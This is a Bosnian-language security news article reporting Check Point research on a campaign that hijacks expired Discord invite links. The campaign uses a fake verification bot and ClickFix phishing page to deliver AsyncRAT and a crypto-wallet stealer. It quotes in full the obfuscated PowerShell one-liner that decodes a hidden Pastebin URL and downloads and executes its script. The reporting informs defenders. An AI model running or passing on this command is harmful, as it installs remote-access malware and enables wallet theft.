Sajber kriminalci su otkrili sofisticiran novi način napada koji iskorištava ozbiljan propust u Discordovom sistemu pozivnica, omogućavajući im da preuzmu kontrolu nad isteklim pozivnim linkovima i preusmjere nesumnjičave korisnike na maliciozne servere koji hostuju napredne kampanje sa malverom.
Ova nova prijetnja koristi činjenicu da je Discord platforma kojoj vjeruju milioni korisnika širom svijeta – posebno gejmeri i online zajednice – kako bi se neprimjetno kompromitovale žrtve putem nekada legitimnih pozivnica koje su možda mjesecima ranije podijeljene na forumima, društvenim mrežama ili službenim web stranicama.
Lanac napada počinje kada hakeri iskoriste Discordov sistem za prilagođene (vanity) pozivne linkove, koji je dostupan isključivo serverima s Level 3 Boost premium pretplatom. Kada legitimni server izgubi Boost status ili kada privremeni link istekne, taj isti kod pozivnice može postati dostupan za ponovno korištenje. Hakeri tada mogu registrovati te kodove kao vlastite prilagođene linkove i povezati ih sa svojim malicioznim serverima.
Na taj način, korisnici koji kliknu na staru, ali prethodno legitimnu Discord pozivnicu, nesvjesno budu preusmjereni na server pod kontrolom napadača, koji je dizajniran da izgleda identično.
Istraživači iz kompanije Check Point su u junu 2025. identifikovali ovu aktivnu malver kampanju i otkrili kako napadači koriste ovu ranjivost Discorda za širenje fišing napada i višefaznih infekcija. Uočeni su stvarni napadi u kojima napadači pažljivo sprovode više faza infekcije kako bi izbjegli detekciju antivirusnih alata i sigurnosnih sandbox sistema.
Kampanja pokazuje visok tehnički nivo, kombinujući ClickFix fišing tehniku, višefazne učitavače (loaders) i vremenske mehanizme za izbjegavanje otkrivanja, kako bi se tiho isporučio AsyncRAT – snažan trojanac za daljinski pristup – zajedno s prilagođenom verzijom Skuld Stealer-a, koji posebno cilja kripto novčanike.
Ono što ovu operaciju čini posebno opasnom jeste činjenica da se preuzimanje malvera i izvlačenje podataka odvijaju isključivo putem pouzdanih cloud servisa kao što su GitHub, Bitbucket, Pastebin i sam Discord, što omogućava da se maliciozni saobraćaj lako “stopi” s normalnim mrežnim aktivnostima i izbjegne bezbjednosne alarme.
Obim i uticaj ove kampanje su značajni, a statistike preuzimanja sa platformi pokazuju da broj potencijalnih žrtava premašuje 1.300 širom Sjedinjenih Američkih Država, Vijetnama, Francuske, Njemačke i Ujedinjenog Kraljevstva. Fokus napadača na malver povezan s kriptovalutama sugeriše da ih primarno motiviše finansijska dobit i da ciljaju korisnike digitalnih sredstava.
Mehanizam društvenog inženjeringa ClickFixa
Mehanizam infekcije koji se koristi u ovoj kampanji je pravi primjer vrhunske socijalne manipulacije. Tehnika pod nazivom ClickFix iskorištava psihološke trikove kako bi žrtve same pokrenule izvršavanje malicioznog koda. Kada korisnik uđe na oteti Discord server, susreće se s prividno legitimnim procesom verifikacije koji vodi bot pod nazivom “Safeguard”, posebno napravljen za ovu kampanju 1. februara 2025.
Klikom na dugme za verifikaciju, korisnik biva preusmjeren na eksternu phishing stranicu (npr. captchaguard[.]me), koja je sofisticirana kopija Discord-ovog korisničkog interfejsa. Stranica prikazuje lažni Google CAPTCHA koji se „ne učitava“, i traži od korisnika da ručno nastavi proces verifikacije.
.webp)
U pozadini, JavaScript kod automatski kopira PowerShell komandu u clipboard korisnika – bez njihovog znanja. Ta komanda koristi tehniku zamjene redoslijeda i Base64 kodiranje kako bi prikrila URL Pastebin servisa, s kojeg se preuzima PowerShell skripta koja zatim pokreće lanac malver infekcije.
nginxCopyEditpowershell -NoExit -Command "$r='NJjeywEMXp3L3Fmcv02bj5ibpJWZ0NXYw9yL6MHc0RHa';$u=($r[-1..-($r.Length)]-join '');$url=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($u));iex (iwr -Uri $url)"
Ova obmanjujuća tehnika je naročito efikasna jer korisnicima prikazuje uobičajene Windows instrukcije: otvaranje Run dijaloga pomoću Win+R, lijepljenje sadržaja iz clipboarda i pritiskanje Enter – radnje koje većina korisnika često izvodi bez sumnje. Time se potpuno eliminiše potreba za ručnim preuzimanjem fajlova, čime se zaobilaze svi standardni bezbjednosni alarmi koji bi mogli upozoriti korisnika na prijetnju.
Izvor: CyberSecurityNews